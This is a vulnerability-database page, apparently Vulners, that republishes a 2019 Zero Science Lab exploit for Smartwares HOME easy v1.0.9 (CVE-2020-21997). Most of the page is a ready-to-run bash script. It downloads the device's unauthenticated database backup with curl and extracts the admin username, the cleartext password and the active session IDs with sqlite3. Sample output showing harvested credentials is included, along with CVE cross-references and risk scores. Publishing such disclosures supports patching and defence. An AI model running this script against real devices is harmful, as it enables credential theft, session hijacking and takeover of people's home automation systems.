Smartwares HOME easy v1.0.9 Database Backup Information Disclosure Exploit

🗓️ 05 Nov 2019 00:00:00Reported by Gjoko KrsticType

zeroscience🔗 www.zeroscience.mk👁 300 Views

Home automation vulnerability allows unauthenticated database backup download, leading to information disclosure and security bypas

Reporter	Title	Published	Views	Family All 8
CNNVD	Smartwares Home Easy 访问控制错误漏洞	29 Apr 202100:00	–	cnnvd
CVE	CVE-2020-21997	29 Apr 202114:17	–	cve
Cvelist	CVE-2020-21997	29 Apr 202114:17	–	cvelist
EUVD	EUVD-2020-14763	7 Oct 202500:30	–	euvd
NVD	CVE-2020-21997	29 Apr 202115:15	–	nvd
Prion	Information disclosure	29 Apr 202115:15	–	prion
Positive Technologies	PT-2021-10712 · Smartwares · Smartwares Home Easy	29 Apr 202100:00	–	ptsecurity
RedhatCVE	CVE-2020-21997	22 May 202515:47	–	redhatcve

<html><body><p>#!/bin/bash
#
#
# Smartwares HOME easy v1.0.9 Database Backup Information Disclosure Exploit
#
#
# Vendor: Smartwares
# Product web page: https://www.smartwares.eu
# Affected version: &lt;=1.0.9
#
# Summary: Home Easy/Smartwares are a range of products designed to remotely
# control your home using wireless technology. Home Easy/Smartwares is very
# simple to set up and allows you to operate your electrical equipment like
# lighting, appliances, heating etc.
#
# Desc: The home automation solution is vulnerable to unauthenticated database
# backup download and information disclosure vulnerability. This can enable the
# attacker to disclose sensitive and clear-text information resulting in authentication
# bypass, session hijacking and full system control.
#
# ==============================================================================
# root@kali:~/homeeasy# ./he_info.sh http://192.168.1.177:8004
# Target: http://192.168.1.177:8004
# Filename: 192.168.1.177:8004-16072019-db.sqlite
# Username: admin
# Password: s3cr3tP4ssw0rd
# Version: 1.0.9
# Sessions: 
# ------------------------------------------------------------------
# * Ft5Mkgr5i9ywVrRH4mAECSaNJkTp5oiC0fpbuIgDIFbE83f3hGGKzIyb3krXHBsy
# * Gcea4Ald4PlVGkOh23mIohGq2Da6h4mX0A8ibkm7by3QSI8TLmuaubrvGABWvWMJ
# * JFU4zpdhuN4RTYgvvAhKQKqnQSvc8MAJ0nMTLYb8F6YzV7WjHe4qYlMH6aSdOlN9
# * VtOqw37a12jPdJH3hJ5E9qrc3I4YY1aU0PmIRkSJecAqMak4TpzTORWIs1zsRInd
# * flR4VjFmDBSiaTmXSYQxf4CdtMT3OQxV0pQ1zwfe98niSI9LIYcO3F2nsUpiDVeH
# * rCfrAvnfnl6BsLjF9FjBoNgPgvqSptcH0i9yMwN3QSDbwNHwu19ROoAVSROamRRk
# ------------------------------------------------------------------
# ==============================================================================
#
# Tested on: Boa/0.94.13
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - https://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2019-5541
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5541.php
#
#
# 30.09.2019
#
#


if [ "$#" -ne 1 ]; then
    echo "Usage: $0 http://ip:port"
    exit 0
fi
TARGET=$1
CHECK=$(curl -Is $TARGET/data.dat 2&gt;/dev/null | head -1 | awk -F" " '{print $2}')
if [[ "$?" = "7" ]] || [[ $CHECK != "200" ]]; then
    echo "No juice."
    exit 1
fi
echo "Target: "$TARGET
FNAME=${TARGET:7}-$(date +"%d%m%Y")
curl -s $TARGET/data.dat -o $FNAME-db.sqlite
echo "Filename: $FNAME-db.sqlite"
echo "Username: "$(sqlite3 $FNAME-db.sqlite "select usrname from usr") # default: admin
echo "Password: "$(sqlite3 $FNAME-db.sqlite "select usrpassword from usr") # default: 111111
echo "Version: "$(sqlite3 $FNAME-db.sqlite "select option_value1 from option LIMIT 1 OFFSET 3")
echo -ne "Sessions: \n"
printf "%0.s-" {1..66}
printf "\n"
sqlite3 $FNAME-db.sqlite "select sessionid from sessiontable" | xargs -L1 echo "*"
printf "%0.s-" {1..66} ; printf "\n\n"
</p></body></html>

05 Nov 2019 00:00Current

7.1High risk

Vulners AI Score7.1

CVSS 25

CVSS 3.17.5

EPSS0.01224